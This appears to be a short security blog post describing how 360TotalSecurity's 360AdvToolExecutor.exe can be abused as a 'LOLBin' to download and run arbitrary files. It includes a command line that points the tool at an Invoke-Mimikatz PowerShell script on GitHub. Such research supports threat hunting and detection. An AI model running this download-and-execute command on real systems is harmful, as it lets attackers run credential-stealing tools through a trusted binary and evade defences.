LOLBINed — 360TotalSecurity (360AdvToolExecutor.exe)

360TotalSecurity Logo

Introduction

360AdvToolExecutor

"C:\Program Files (x86)\360\Total Security\Utils\360AdvToolExecutor.exe" /TASKTYPE=InstallBySetup /ADVTOOLIDS=360 Zip "/ADVTOOLURL=http://int.down.360safe.com/360zip/360zip_setup.exe" "/SETUPPARAM=/S /pid=tools" /ADVTOOLNOTIFY=197896
%appdata%\360TotalSecurity\360AdvToolExecutor\Setup
The message is showing a “Corrupted Installation” and repair suggestion
360AdvToolExecutor.exe /TASKTYPE=InstallBySetup "/ADVTOOLURL=https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1"
Exec
ProcessTree

Achieving a full chain will mean that the “360AdvToolExecutor” binary will download and execute anything from the internet which could be very interesting :)

Conclusion

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.